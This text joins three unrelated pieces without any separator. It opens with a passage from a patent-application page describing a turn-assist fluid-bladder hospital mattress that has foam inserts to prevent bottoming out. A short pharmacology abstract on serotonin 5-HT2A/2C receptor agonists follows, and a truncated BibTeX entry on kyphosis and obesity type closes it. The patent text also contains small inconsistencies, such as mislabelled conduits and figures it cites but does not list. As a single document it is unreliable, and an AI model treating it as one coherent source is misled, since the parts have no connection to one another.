inflated, (b) deflated or (c) being deflated;wherein the first left section and the second left section can be (a) inflated at (i) the same pressure level or different pressure levels, (ii) the same inflation rate or different inflation rates and/or (iii) the same time or different times; and/or (b) deflated at (i) the same time or different times, (ii) the same inflation rate or different inflation rates and/or (iii) the same pressure level or different pressure levels to allow a patient assistant to have access to and to provide care and/or treatment to a particular patient's body part that is positioned over the first left section or the second left section when the first left section or the second left section are inflated to rotate (turn) the patient and the other left section is (a) being inflated, (b) deflated or (c) being deflated;controlling the inflation/deflation of one set of first and second sections so either the first or the second section is inflated or deflated so at least a portion of the patient that contacts the one set of first and second sections is exposed so that portion of the patient can be treated and cared for, while the other set of first and second sections is in the set position. Description: FIELD OF THE INVENTION [0001]The present invention is directed to a fluid bladder mattress system. BACKGROUND OF THE INVENTION [0002]Inflatable therapeutic supports for patients have been well known for many years. Such therapeutic supports include inflatable mattresses and cushions. [0003]Most therapeutic supports are designed to reduce "interface pressures." Interface pressures are the pressures encountered between the therapeutic support and the skin of a patient positioned on the therapeutic support. It is well known that interface pressures can significantly affect the well-being of immobile patients in that higher interface pressures can (a) reduce local blood circulation, (b) cause bed sores and (c) cause other medical complications. With inflatable mattresses, such interface pressures depend (in part) on the air pressure within the inflatable bladders. Bladders [0004]Every inflatable therapeutic support has at least one bladder. That bladder has a top surface capable of receiving an object like a patient, a bottom surface that is opposite the top surface, and at least one side surface positioned between the top and bottom surfaces. The bladder surfaces can be a fluid impermeable material, fluid permeable material or combinations thereof depending on the desired application. For example, the bladder material can be a polymeric material, for example, vinyl, polyethylene, polyurethane or combinations thereof. The bladder can be made from a single piece of material or a plurality of materials to obtain the desired results. These various surfaces define a bladder cavity that receives a fluid. [0005]The bladder cavity receives the fluid, normally air or an aqueous solution, through an inlet from a fluid source. The fluid travels from the fluid source through a conduit(s) and the fluid's flow, flow rate, and temperature (those characteristics and others are commonly referred to as therapeutic fluid traits) are normally controlled by a control unit. [0006]The control unit, for example, has a plurality of input keys interconnected to at least a microprocessor. The patient or patient's caregiver essentially controls the therapeutic fluid traits through the input keys. The term input keys means a keyboard system, switches, software chips, levers, dials or any other conventional device that is used as an input device by the patient or patient's caregiver to control the operation of the therapeutic fluid traits. [0007]In the microprocessor embodiment, the microprocessor receives the desired instructions from the input keys. From those instructions, the microprocessor processes those instructions to transmit the desired signals to operate a pump, an air compressor, a heater, a cooler, a fan, valves and/or switches that push, pull and/or allows (by potential energy contained in the bladder(s)) a fluid into, through or to pass into a first conduit(s) to the respective bladder(s) at the desired therapeutic fluid traits. Prior to entering the conduits, the fluid is contained within a heated reservoir, a cooled reservoir, an ambient reservoir, ambient environment and/or combinations thereof; a.k.a., fluid source. [0008]From this fundamental understanding of inflatable bladders, the variations of bladders are evident. For example, some bladders (1) have the inlet removed after the fluid is inserted into the bladder cavity so the bladder is a self-contained, static bladder and (2) retain the inlet so the bladder is a dynamic bladder that can receive and/or release fluid from the bladder cavity. [0009]In the dynamic bladder embodiment, the fluid exits the bladder through at least one outlet. In one version, the fluid exits the outlet (a.k.a., the inlet) through the first conduit to return to the fluid source. In other versions the fluid exits the outlet (not the inlet) through a second conduit to a receiving unit (distinct from the fluid source) or the fluid source. Another version has the surface of the bladder having a plurality of apertures designed to release a portion of the fluid (normally air) toward the object positioned above the inflatable bladder (a.k.a., low-loss bladder). Other outlet versions have combinations of the above-identified outlet versions. [0010]There may be alternative embodiments to these generic descriptions of dynamic bladders and control units. The bladders may have alterations to (1) generate desired fluid flow patterns within the bladder, (2) obtain desired bladder firmness and (3) allow the bladder adaptability for the therapeutic support system. To obtain such results and others like it, the bladders could have predetermined button welds, welds, and slits along welds. Welds are locations where the bladder's top surface is connected to the bladder's bottom surface. Standard Therapeutic Bladder [0011]One example of a therapeutic patient support system having a therapeutic bladder is disclosed by Hand et al. in expired U.S. Pat. No. 5,606,754. Hand et al. disclose "a . . . patient support system [having] a rigid support frame [and] a plurality of inflatable [bladders] supported upon the support frame with each [bladder] having an upper surface so that the plurality of [bladders form] a patient support surface. The inflatable [bladders] are pressurized and maintained at a predetermined pressure. This predetermined pressure may be a patient height and weight specific pressure profile." It is known that the bladders can be positioned horizontally (a.k.a., perpendicular to a patient properly positioned on the therapeutic support) and/or vertically (a.k.a., parallel to a patient properly positioned on the therapeutic support) in relation to the support frame. This therapeutic patient support system embodiment utilizes a standard therapeutic fluid bladder. Wave Therapy [0012]When the bladders on a standard support frame are positioned horizontally, the bladders can be divided into at least two sets (1-2-1-2) to provide wave therapy. Wave therapy is accomplished when (a) the first set of bladders receives fluid and, at the same time, the second set of bladders releases fluid; and then (b) the second set of bladders receives fluid and, at the same time, the first set of bladders releases fluid. That process causes a wave sensation under the patient. The wave therapy can occur with additional sets of bladders, for example "1-2-3-4-1-2-3-4", "1-3-2-1-3-2" and variations thereof. [0013]The wave therapy, in one embodiment, is accomplished by (a) the first bladder set interconnects to the control unit through a primary first conduit system; and (b) the second bladder set interconnects to the control unit through a secondary first conduit system. To obtain the desired wave therapy, the control unit positions a valve that transmits fluid to either the primary first conduit system or the secondary first conduit system in predetermined time frames to obtain the wave motion. The control unit can also alter the valve so the primary first conduit system and the secondary first conduit system receive fluid simultaneously if no wave therapy is desired. Turn-Assist Bladder Therapy [0014]Turn-assist bladder therapy is an obvious variation of a rotating bladder therapy. The rotating embodiment is used to decrease sores on immobile patients. An example of a rotating (turn-assist) therapy is disclosed in U.S. Pat. No. 5,794,289 which is commonly assigned and is hereby incorporated by reference. [0015]In U.S. Pat. No. 5,794,289, Gaymar describes a rotating bladder system 10 having upper and lower right side rotating bladder(s) 12a,b and upper and lower left side rotating bladder(s) 14a,b positioned below a surface bladder 180. The rotating bladders rotate a patient positioned on the surface bladder by controlling the air pressure in the right set of rotating bladders and the left set of rotating bladders. The right rotating bladder set is inflated and deflated simultaneously; likewise the left rotating bladder set is inflated and deflated simultaneously. This is accomplished by having the bladders 12a,b interconnected to the control unit 20 through a first conduit 16 and the bladders 14a.b interconnected to the control unit 20 through a second conduit 18 as illustrated in FIGS. 1, 2, and 3. [0016]To rotate a patient 11 to its right side requires decreasing the air pressure in the right set of rotating bladder(s) 12a,b while increasing the air pressure in the left side rotating bladder 14a,b so the left side is higher than the right side as illustrated in FIGS. 1, 2 and 3. [0017]To rotate the patient to the patient's left side requires decreasing the air pressure in the left side rotating bladder(s) 14a,b and increasing the air pressure in the right side rotating bladder 12a,b, so it is opposite of what is illustrated in FIGS. 1, 2 and 3. [0018]The air pressure required to rotate the patient depends on the patient's weight, body type and various other parameters. The quantity of air pressure that rotates one patient, e.g., 30 degrees, may rotate another patient, e.g., 5 degrees. For example, two female patients weigh 130 pounds, one patient is pear-shaped and the other is apple-shaped. The pear-shaped patient rotates 15 degrees with 10 mm Hg while an apple-shaped patient rotates 7 degrees with 10 mm Hg. Obviously each patient is unique and different and the control unit has to be controlled to provide the desired rotation for each patient. [0019]As clearly set forth in Hill-Rom's U.S. patent application publication number 2006/0168736, turn-assist bladders and rotational bladders are essentially synonymous--"a turn-assist cushion or turning bladder or rotational bladder 74 . . . ." If there is a difference between a turn-assist bladder and a rotation bladder, the difference is in the software used in the control unit. In the rotation bladder embodiment, the control unit (1) has the bladders in a set position--planar which can be completely deflated or just partially inflated, (2) rotates the patient, through the bladders, in a first direction by inflating one set of rotating bladders (for example the right set), (3) reverts the bladders to the set position, (4) rotates the patient, through the bladders, in a second direction by inflating the other set of rotating bladders (for example the left set) and (5) reverts to the set position. The turn-assist bladder embodiment, in contrast, eliminates the third step. Accordingly, it seems relatively obvious that the technology for the turn-assist embodiment is an obvious variation of the rotation bladder embodiment by merely altering the software used in the control unit so the bladders are rotated from a first direction to a second direction without the intermediate step of reverting to a set position. [0020]In the prior art and as previously described above, the upper section and the lower section for each right and left set of rotational (or turn-assist) bladders are inflated at the same time to obtain the desired rotation. Moreover, the rotational (or turn-assist) bladders are positioned below other bladders or other cushion materials. See FIG. 11 (rotational bladders 184, 188 are under cushion 180) in U.S. Pat. No. 5,794,289; FIGS. 17 to 19 (rotational bladders 145, 146, 147, 148 are under cushion 182) in U.S. Pat. No. 6,584,628; FIG. 3 (rotational bladders 80 are below cushion 60) in U.S. patent application publication number 2006/0168736; and FIG. 4 (rotational bladders 110 are positioned below cushions 33) in U.S. Pat. No. 6,499,167. In other words, the rotating (turn-assist) bladders are positioned below another cushion which the patient is designed to be positioned upon. [0021]Like the standard bladder therapy system, the rotating bladder therapy system can also provide wave therapy. In most embodiments, the wave therapy, on a rotating bladder therapy system, occurs when (1) the rotating bladders are in the set position--generally planar--and (2) the wave therapy bladders are positioned above the rotating bladders. The wave therapy bladders are not the same as the rotating (turn-assist) bladders. Rotating (turn-assist) bladders do not perform wave therapy. One reason wave therapy is not performed by the rotating bladders is because the rotating bladders are positioned below another bladder. Software Means to Inhibit Bottoming Out [0022]Programming an air pressure cushion unit requires a skilled technician. The skilled technician analyzes each patient and alters the programming to attain the desired air pressure. One method to avoid the expensive technician's analysis and re-programming is to create a self-monitoring mattress. [0023]Previous self-monitoring air pressure cushions have utilized electrical signal transmission devices and electrical signal receiving devices. In one embodiment, the transmission device is a part of the top surface of a bladder and the receiving device is a part of the bottom surface of the bladder. That means the transmission and receiving devices are separated by a bladder cavity. By monitoring the duration of the signal from the transmitter to the receiver, the operator can monitor the size of the bladder. The size of the bladder corresponds to the air pressure and, it desired, the rotation of the patient. Such signal devices are disclosed in U.S. Pat. No. 5,794,289. Those signal devices generate electrical signals, like rf signals, that may, however, adversely effect other medical equipment. In particular, Wortman et al. disclosed (without reference numbers): [0024][There] is illustrated an inflatable cushion which is shown to be similar to cushion but may be any other suitable inflatable cushion. The cushion is provided with button welds to prevent ballooning thereof. The cushion has upper and lower surfaces. Cushion inflation is related to the distance between the upper and lower surfaces. [0025]In order to prevent bottoming-out from occurring and to more precisely regulate the cushion inflation, the cushion is inflated so that the distance between the upper and lower surfaces is a predetermined distance. A transmitter coil and a receiver coil are provided adjacent the upper and lower surfaces, and the distance there between is related to the signal strength of a signal transmitted there between. Alternatively, the coil may be provided adjacent the lower surface, and the coil provided adjacent the upper surface. [0026]In any case, those Gaymar patents illustrate that controlling the air in a cushion is desirable to prevent bottoming and prevent excess pressure being applied to the patient. "Bottoming" refers to any state where the upper surface of any given cushion is depressed to a point that it contacts the lower surface, thereby markedly increasing the interface pressure where the two surfaces contact each other. Prior to bottoming occurring, the pressure exerted by the bladder on the skin of the object becomes excessive. Those bottoming sensors are acceptable but Gaymar has been seeking to improve such sensors and/or eliminate them. The improvements are made for numerous reasons. Some of these reasons are and not limited to cost, reliability, easiness or difficulty to install and adjust the system, and simplicity. In addition, the bottoming sensor should be able to diminish the chance of bottoming out and also decrease the chance that the cushion will exert too much pressure to the patient. [0027]Currently, rotating bladders are positioned below other bladders. That "other bladder over the rotating bladder" embodiment decreases the rotating bladders' efficiency of providing the desired rotation therapy. Merely removing the other bladder causes other problems for example bottoming out. The bottoming out problem with rotating bladders has been previously discussed above. The bottoming out issue remains a problem when the other bladders are removed to maximize the rotating bladder's therapy efficiency. Moreover, positioning bladders or other resilient materials (foam or gelastic material) below the rotating bladders is not desired because the rotating bladders are positioned over a non-secure, non-rigid material. Foam Filled Bladder [0028]A different bladder embodiment is disclosed by Stryker's U.S. Pat. No. 5,325,551. In the '551 patent, Stryker disclosed a bladder completely filled with foam having apertures and the air circulates through those apertures. Stryker wrote (without reference numbers), "An inflatable air bladder of generally rectangular shape rests on the bottom sheet between the side elements [of a mattress] so that three sides of the air bladder engage the respectively concave surfaces [of the mattress]. The vertical thickness of the air bladder is substantially equal to the vertical thicknesses of side elements and head element [of the mattress]. The end of the air bladder remote from element is approximately flushly aligned with the adjacent end surfaces of the side elements. The internal construction of the air bladder is described in more detail later. Two air hoses each communicate with the interior of the air bladder at opposite corners of the end nearest the foot end of the mattress. The air hoses have at the outer ends thereof respective conventional connector elements . . . . The foam elements are somewhat stiffer than the pressurized bladder, and thus serve as a frame which helps to keep a patient centered on the bladder. Also, after giving a hypodermic injection, hospital personnel sometimes insert the needle temporarily into a mattress while completing other tasks. In the preferred embodiment, the six inch horizontal width of foam elements and the two inch vertical thickness of foam sheets [positioned over the bladders] protect against puncture of the bladder in the event a hypodermic needle is inserted into the mattress unit . . . . The air bladder is filled by a foam sheet which is of generally rectangular shape. In the preferred embodiment, the foam sheet has an ILD for the foam material itself which is less than 15 lbs. The foam sheet has above it an upper sheet and has below it a lower sheet. In the preferred embodiment, the [foam] sheets are made of polyurethane-coated nylon. The [foam] sheets are bonded in a conventional manner to the surfaces of the foam core, and along the peripheral edges of the foam core the [foam] sheets are bonded to each other in a conventional manner. [0029]The foam core has a plurality of horizontal cylindrical holes extending transversely therethrough. The holes soften the [foam] sheet, and also facilitate rapid air movement within the bladder so that pressure equilibrium is quickly restored after a change. It should be noted that the spacing between adjacent holes is, for the four holes at the head end of the bladder and the three holes at the opposite end, approximately half the spacing between adjacent holes in the center region of the bladder. The holes increase the softness of the air bladder, and in particular can be used to give the foam sheet an effective ILD value which is less than the rated ILD value of the material of the foam sheet when no holes are present, and in fact the provision of holes allows the foam sheet to be given an effective ILD value which is less than the lowest ILD foam material readily available on the commercial market. By varying the spacing between adjacent holes in different portions of the foam sheet . . . respective portions of the foam sheet can be given different effective ILD values. In the preferred embodiment, the holes are all of uniform diameter and the spacing between adjacent holes is varied, but it will be recognized that an equivalent result can be achieved by varying the diameters of the holes while maintaining a uniform spacing between adjacent holes, or by varying both the diameters and the spacing. Also, of course, the effective ILD of the foam can be relatively uniformly reduced by using uniformly spaced holes of equal diameter. The result is that different portions of the bladder will exhibit different stiffness properties even though the same air pressure is present throughout the bladder." (Bolded words for emphasis.) A problem with that embodiment is that the foam is really the cushion material, not the air in the bladder. It is preferred that the fluid in the air bladder be the principal source of pressure applied to the patient, not the foam. Moreover, a bladder filled with foam is unable to be a rotating bladder or a wave bladder since the foam does not expand with air. Air Bladder and Gel Material Cushion [0030]In U.S. Pat. No. 6,554,785; Sroufe et al. wrote, "An orthopedic device of a therapeutic nature which includes an air bladder and an overlying gel bladder. The air and gel bladders are joined and are secured within a retainer which is adapted to be placed about a body part of a patient with the air or gel bladder being positioned next to the body part." The gel bladder is positioned over the air bladder so the gel bladder is the principal bladder that contacts the patient. [0031]In U.S. Pat. No. 6,306,112; Bird wrote, "A therapeutic ankle support brace bladder pad member having a pair opposed surfaces defining an inflated air support pocket and a second support pocket containing gel material and filler apparatus materials, is disclosed. An overlay fabric material is integrally attached to the bladder, provides additional support and enables removable attachment of the bladder to side support members of a therapeutic brace." That means the air bladder contacts first portion of a patient and gel bladder contacts a second portion of the patient. [0032]In U.S. Pat. Nos. 6,306,112 and 6,554,785, the inventors fail to disclose a dynamic air bladder or a resilient member in a dynamic air bladder or equivalents thereof. Instead the inventors concentrate on applying the desired gel cushion characteristics to one part of a patient's body and air cushion characteristics to a second part of a patient's body. [0033]Those problems are solved by the current invention that is disclosed in the present application. SUMMARY OF THE INVENTION [0034]A fluid bladder system has a conventional fluid bladder and a resilient member in the fluid bladder. The resilient member is of a size that it allows the fluid in the fluid bladder to be the principal support applied to the patient. The resilient member only applies a force to the patient only after the patient displaces the fluid in the fluid bladder so the resilient structure is the only entity that inhibits the patient from bottoming out. BRIEF DESCRIPTION OF THE DRAWINGS [0035]FIG. 1 illustrates a patient positioned over rotating bladders of a therapeutic support from a head end of the rotating bladders--Prior Art. [0036]FIG. 2 illustrates FIG. 1 from arrow 2--Prior Art. [0037]FIG. 3 illustrates FIG. 1 from arrow 3--Prior Art. [0038]FIG. 4 illustrates a top view of rotational (turn-assist) bladders (a) on a support surface and (b) interconnected to a control unit. [0039]FIG. 5 illustrates a side view of rotational (turn-assist) bladders on a support surface. [0040]FIG. 6 illustrates an alternative embodiment of FIG. 5. [0041]FIG. 7 illustrates an alternative embodiment of FIG. 4 with additional cushions positioned over opposing left-right rotational (turn-assist) bladders. [0042]FIG. 8 illustrates a schematic of the control unit. [0043]FIG. 9a illustrates a side view of FIG. 4 taken from arrow 4 when the right rotational (turn-assist) bladders are being inflated simultaneously. [0044]FIG. 9b illustrates an embodiment of FIG. 9a when the second right rotational (turn-assist) bladder remains inflated and the first right rotational (turn-assist) bladder deflates to expose a first portion of the patient that normally contacts the right rotational (turn-assist) bladder so a patient's assistant can care and treat the patient at the first portion without excessively disturbing the patient. [0045]FIG. 9c illustrates an embodiment of FIG. 9a when the first right rotational (turn-assist) bladder is inflated and the second right rotational (turn-assist) bladder deflates to expose a second portion of the patient that normally contacts the right rotational (turn-assist) bladder so a patient's assistant can care and treat the patient at the second portion without excessively disturbing the patient. [0046]FIG. 10 illustrates an alternative embodiment to accomplish FIGS. 9a and 9b. [0047]FIG. 11 illustrates an alternative embodiment of FIG. 4. [0048]FIG. 12 illustrates an alternative embodiment of FIG. 4. [0049]FIG. 13 illustrates an alternative embodiment of FIG. 7. [0050]FIG. 14 illustrates an alternate version of FIG. 9a. DETAILED DESCRIPTION OF THE INVENTION [0051]The present invention is directed to a variation of a bladder that can be used as a static bladder and/or preferably a dynamic bladder to provide support, wave therapy, a rotational (turn-assist) therapy, percussion therapy, access ability, or variations and combinations thereof. To merely illustrate the present bladder invention, we will concentrate on the rotational (turn-assist) support system 110 as an example. [0052]The present rotational (turn-assist) support system 110 is similar to the prior art rotational (turn-assist) support system 10. One of the similarities is that the rotational (turn-assist) bladders 122, 124, 132, 134 are positioned on a rigid, secure support surface 102. The support surface 102 can be a part of a rigid and secure mattress, a rigid, secure foam surface, a solid surface or any other location that provides support to a patient. The variations are in the rotational (turn-assist) bladder 122, 124, 132, 134 and possibly, in certain embodiments, the control unit 210. The rotational (turn-assist) bladder system 110 can extend the entire length of the support surface 102 as illustrated in FIG. 5 or just partially as illustrated in FIG. 6. [0053]As illustrated in FIG. 4, the rotational (turn-assist) bladder system 110 has a right side bladder unit 120 and a left side bladder unit 130. The right side bladder unit 120 is subdivided into at least a first right section 122 and a second right section 124. Likewise, the left side bladder unit 130 is subdivided into at least a first left section 132 and a second left section 134. [0054]Unlike the prior art, the rotational (turn-assist) bladder system 110 can be positioned immediately below a patient 200, as illustrated at FIGS. 5 and 6, without any intervening cushion that interferes with the operation of the rotational therapy. There is no single cushion material that must overlay the entire rotational (turn-assist) bladder system 110 or an entire bladder unit 120, 130 because that would violate the fundamental basis of the present invention. Instead there can be (a) optional individual cushions 160a, b, c, d (bladders, gelastic material (a honey-comb tri-block A-B-A copolymer composition) and/or foam material) positioned over bladders sections 122, 124, 132, 134 as illustrated in FIG. 13 or (b) cushions 162a, b that extend across pairs of opposing left-right bladders sections, like sections 122 and 132 or sections 124 and 134 as illustrated in FIG. 7. [0055]There can be optional covers, blankets (conventional, conductive and/or convective) and/or pads (incontinence, heating, cooling, and/or positioning), not shown, positioned between the patient 200 and the rotational (turn-assist) bladder system 110. [0056]Within each bladder 122, 124, 132, 134 and as illustrated in FIGS. 14a,b is a resilient structure 92. The resilient structure 92 is a conventional foam material. The resilient structure 92 has a top surface 93, a bottom surface 94 and a side surface 95 having a predetermined height. The bottom surface 94 contacts the bladder's bottom surface 88. The predetermined height is equal to a height that inhibits the patient from contacting the bladder's bottom surface. That predetermined height ranges from being (a) not contacting the height of the inflated bladder in the set (normal inflation) position (FIG. 14a) to (b) a height above the bladder's bottom surface 88 so the patient does not bottom out with the desired resilient structure. The size and position of the resilient structure 92 does not interfere with the normal operation of the bladder and preferred bladder fluid forces applied to the patient. Instead the size and position of the resilient structure 92 is utilized only when the fluid is compressed and/or moved so there is little to no fluid between the patient and the resilient structure. In a preferred operation, the patient will not contact the resilient structure 92, however, Gaymar has realized that technicians do not always account for various patient weights and shapes that may cause the patient to bottom out. Thereby, the resilient structure decreases the chance the patient bottoms out especially when the bladders are performing rotation (turn-assist) therapy (see FIG. 14b and 9a), wave therapy, percussion therapy, and/or access therapy, which will be explained in greater detail below. [0057]In a preferred embodiment the resilient structure 92 extends the width of the bladder, but it can be a shorter width depending on where the patient is most likely to be bottomed out during the respective therapy. The resilient structure 92 can be a foam, a gelastic surface (see U.S. Pat. No. 7,076,822 to Pearce and U.S. Pat. No. 6,767,621 to Flick [commonly assigned], which are hereby incorporated by reference), and a resilient structure enclosed in a bladder material (identified above). [0058]As illustrated in FIG. 4, the first right side bladder unit 122 interconnects to the control unit 210 through a first right conduit 123 and the second right side bladder unit 124 interconnects to the control unit 210 through a second right conduit 125. The control unit 210 distributes the desired amount of fluid to each right bladder unit 122, 124. Likewise, the first left side bladder unit 132 interconnects to the control unit 210 through a first left conduit 133 and the second left side bladder unit 134 interconnects to the control unit 210 through a second right conduit 135. The control unit 210 distributes the desired amount of fluid to each left bladder unit 132, 134 through the respective conduit. This embodiment is also not described, suggested or taught in the prior art because the prior art discloses that the bladder units 122, 124 or 132, 134 are to inflate simultaneously through the same conduits, not different conduits. [0059]The principle of how the control unit 210, as illustrated schematically at FIG. 8 distributes fluid to different conduits and not to other conduits, or all of them is similar to the prior art. Instead, there are just more valves 212a,b,c,d interconnected to a microprocessor 214 that correspond to the respective conduits 123, 125, 133, 135 to obtain the desired operation of the present invention. [0060]Recall that the control unit 210, for example, has a plurality of input keys 216 interconnected to at least the microprocessor 214. That microprocessor 214 interconnects to pumps, coolers, heaters, fans, valves and/or switches (collectively box 216) that push, pull and/or allows (by potential energy contained in the bladder(s)) a fluid into, through or pass into the conduit(s) 123, 125, 133, 135 to the respective bladder(s) 122, 124, 132, 134. Prior to entering the conduits, the fluid is contained within a reservoir and/or ambient environment; a.k.a., fluid source. The fluid source can be within the control unit 210 or exterior to the control unit 210. Likewise the input keys 216 can be a part of the control unit 210, tethered to the control unit 210 or remotely interconnected to the control unit 210. [0061]The control unit 210 can be positioned within the support system 100 or exterior to it. It depends on how the product is to be designed. Operation of the Product for Rotation/Access Therapy: [0062]For this example, we will assume the patient will be initially turned to the left side. Obviously, the patient can be turned to the right side first, as well. It merely depends on (1) which side the patient wants to be positioned on first and/or (2) how the patient's assistant (including and not limited to a nurse, a nurse practitioner, a nursers aide, an aide, a friend, and/or a family member), who can control the support surface, wants the patient to be positioned first. [0063]The first right section 122 and the second right section 124 are inflated at the same time (same as the prior art) as illustrated in FIG. 9a or at different rates or times, as illustrated in FIG. 10 (not the same as the prior art), to obtain the desired angle. The sections 122 and 124 can be inflated at different times and/or rates because (1) each section 122, 124 is interconnected to the control unit 210 through different conduits and (2) the patient's assistant (or the manufacturer) can program the control unit through the microprocessor and/or input keys to open the valves to conduits 213, 215 at different times or with different apertures to control the inflation rate. [0064]In a first embodiment, once the patient is properly rotated (turned) to the desired angle with both bladders 122, 124 (as illustrated in FIG. 9a) inflated for rotation (turning) purposes, the patient may displace the fluid in the non-rotating bladders (as illustrated in FIG. 9--132 and 134) because a large proportion of the patient's weight when rotated is directed onto the non-rotating bladders 132 and 134. The resilient structures 92 in the non-rotating bladders (132 and 134) inhibit the patient from bottoming out. Once the patient is inhibited from bottoming out, the patient's assistant can begin to deflate one of the inflated and rotated (turned) sections 122, 124. For purposes of this example as illustrated in FIG. 9b, the section 122 is initially deflated. Why begin to deflate just one of the inflated and rotated sections? That way, the patient's assistant exposes a predetermined area (examples include and are not limited to the right side of the sacral region, the thoracic region, the lumbar region, the cervical region, the abdominal area, and/or the chest area) of the patient that normally contacts the section 122. Deflating the respective current rotating section 122 while maintaining the rotation angle of the other current rotating section 124 greatly enhances the patient's assistant ability to wash, treat, inspect the initial predetermined area of the patient, without the using props (pillows typically) or additional patient's assistants to hold the patient in position. This invention comforts the patient. [0065]Once the patient's assistant is completed caring and treating the initial predetermined area, the section 122 is inflated to the desired rotation level and the section 124 can be deflated to expose a second predetermined area of the patient as illustrated in FIG. 9c. Deflating the section 124 greatly enhances the patient's assistant ability to wash, treat, inspect the second predetermined area of the patient, without the using props (pillows typically) or additional patient's assistants to hold the patient in position. [0066]Alternatively, when the section 122 is being inflated the section 124 can be simultaneously deflated to expedite the transition process. [0067]It does not matter which section 122, 124 is deflated first or second in this first embodiment, so long as the patient's assistant has the opportunity to expose a predetermined area to care and treat the patient while the patient remains in the rotated position. [0068]A second embodiment occurs when the sections 122, 124 are being inflated at different times or different rates as illustrated in FIG. 10. The section that is being inflated at the slower rate or at a later time (hereinafter "slow section") inherently exposes a first predetermined area to the patient's assistant as shown in FIGS. 9b and 9c. That way the patient's assistant can wash, treat, inspect the predetermined area of the patient, without the using props (pillows typically) or additional patient's assistants to hold the patient in position. Once the slow section is fully inflated to the desired rotation (or turning) the fast section can be deflated so the patient's assistant can care and treat a different predetermined area of the patient. [0069]Alternatively, when the slow section is being inflated the fast section can be simultaneously deflated to expedite the transition process. [0070]A third embodiment occurs when the patient is rotated to the right side so sections 132 and 134 are inflated for rotation purposes. This third embodiment is the same as the first and second embodiments except the sections are on the opposite side of the support surface. Horizontal/Vertically [0071]The bladder sections 122, 124, 126, 132, 134, 136 can be positioned horizontally and/or vertically as defined above. Self-Monitoring [0072]Programming an air pressure mattress unit requires a skilled technician. The skilled technician analyzes each patient and alters the programming to attain the desired rotation and air pressure. One means to avoid the expensive technician's analysis and re-programming is to create a self-monitoring mattress. [0073]Previous self-monitoring air pressure mattresses have utilized electrical signal transmission devices and electrical signal receiving devices that sandwich the top and bottom of each bladder to monitor the bladder size. The bladder size corresponds to the desired rotation and air pressure. Such signal devices are disclosed in commonly assigned U.S. Pat. Nos. 5,794,289 and 5,926,883; which are hereby incorporated by reference. Those signal devices generate signals, like rf or light signals, that determine the proper level of inflation in the rotating (turning) bladders. Conduits [0074]The conduits can be conventional tubing used in the therapeutic industry. The conduits can have additional valves like a one-way passage valve. [0075]It is intended that the above description of the preferred embodiments of the structure of the present invention and the description of its operation are but one or two enabling best mode embodiments for implementing the invention. Other modifications and variations are likely to be conceived of by those skilled in the art upon a reading of the preferred embodiments and a consideration of the appended claims and drawings. These modifications and variations still fall within the breadth and scope of the disclosure of the present invention. Patent applications by James H. Price, Mount Pleasant, SC US Patent applications by GAYMAR INDUSTRIES, INC. Patent applications in class Variably pressurizable chambers (e.g., with pump) Patent applications in all subclasses Variably pressurizable chambers (e.g., with pump) User Contributions: Comment about this patent or add new information about this topic: CAPTCHA Similar patent applications: DateTitle 2012-08-09Distributed thermoelectric string and insulating panel and applications for local heating, local cooling, and power generation from heat 2008-10-23Foam rail interlocking and banding system 2010-05-06Integrated bedding cover system and method 2012-02-16Pillow with air bladder insert 2008-10-16Pillow with central spaced internal baffles New patent applications in this class: DateTitle 2013-03-14Air mattress having only two inflate/deflate ports for inflating four or six separate bladders 2013-02-14Air mattress system 2013-02-07System and method for controlling air mattress inflation and deflation 2012-07-12Control for pressurized bladder in a patient support apparatus 2012-06-14Mattress deflation management New patent applications from these inventors: DateTitle 2010-12-09Wound treatment apparatus 2009-07-23Patient support surface with vital signs sensors Top Inventors for class "Beds" RankInventor's name 1David W. Hornbach 2Richard H. Heimbrock 3Jonathan D. Turner 4Christopher R. O'Keefe 5Eric R. Meyer
Pleiotropic behavior of 5-HT(2A) and 5-HT(2C) receptor agonists K. A. Berg, S. Maayani, J. Goldfarb, W. P. Clarke Research output: Contribution to journalArticlepeer-review 59 Scopus citations Abstract There is now considerable evidence that a single receptor subtype can couple to multiple effector pathways within a cell. Recently, Kenakin proposed a new concept, termed 'agonist-directed trafficking of receptor stimulus', that suggests that agonists may be able to selectively activate a subset of multiple signaling pathways coupled to a single receptor subtype. 5-HT(2A) and 5-HT(2C) receptors couple to phospholipase C-(PLC) mediated inositol phosphate (IP) accumulation and PLA2-mediated arachidonic acid (AA) release. Relative efficacies of agonists (referenced to 5-HT) differed depending upon whether IP accumulation or AA release was measured. For the 5-HT(2C) receptor system, some agonists (e.g. TFMPP) preferentially activated the PLC-IP pathway, whereas others (e.g. LSD) favored PLA2-AA. As expected, EC50's of agonists did not differ between pathways. For the 5-HT(2A) receptor system, all agonists tested had greater relative efficacy for PLA2-AA than for PLC-IP. In contrast, relative efficacies were not different for 5-HT(2A) agonists when sequential effects in a pathway were measured (IP accumulation vs. calcium mobilization). These data strongly support the agonist-directed trafficking hypothesis. Original languageEnglish (US) Pages (from-to)104-110 Number of pages7 JournalAnnals of the New York Academy of Sciences Volume861 DOIs StatePublished - Jan 1 1998 ASJC Scopus subject areas • Neuroscience(all) • Biochemistry, Genetics and Molecular Biology(all) • History and Philosophy of Science Fingerprint Dive into the research topics of 'Pleiotropic behavior of 5-HT(2A) and 5-HT(2C) receptor agonists'. Together they form a unique fingerprint. Cite this
@ARTICLE{Allami, author = {Allami, Adel and Golpayegani, Masoud and Shahjerdi, Shahnaz and }, title = {Kyphosis in apple-shaped and pear-shaped obesity}, volume = {20}, number = {5}, abstract ={Background and Aim: Obesity is an important factor leading to spine abnormalities. Body fat distribution (type of obesity) is important in relation to its effect on the health of people. The purpose of the present study was to compare thoracic curvature and its abnormality (kyphosis) in apple-shaped and pear-shaped obesity. Material and Methods: This was a case-control study. The subjects in this study consisted of the 6th grade, primary school girls in Arak City, in Iran. 122 obese students were screened using non-randomized and purposeful sampling method based on their body mass index. Finally, 61 students participated in this study. Then, based on waist-to-hip ratio, the students were divided into apple-shaped and pear-shaped obesity groups. Results: We found significant differences between the two groups in relation to the degree of thoracic curvature and the incidence of kyphosis which were more pronounced and more prevalent in the subjects with apple-shaped obesity. Conclusion: The difference in the degree of thoracic curvature and the incidence of kyphosis in the two obesity groups were possibly related to the type of obesity, namely, body fat distribution. It seems that the type of obesity affects the thoracic curvature and can lead to kyphosis. Keywords: Apple-shaped obesity, Fat distribution, Kyphosis, Thoracic curvature, Pear-shaped obesity.   Received: Jun 15, 2015      Accepted: Sep 12, 2015 }, URL = {http://sjku.muk.ac.ir/article-1-2036-en.html}, eprint = {http://sjku.muk.ac.ir/article-1-2036-en.pdf}, journal = {Scientific Journal of 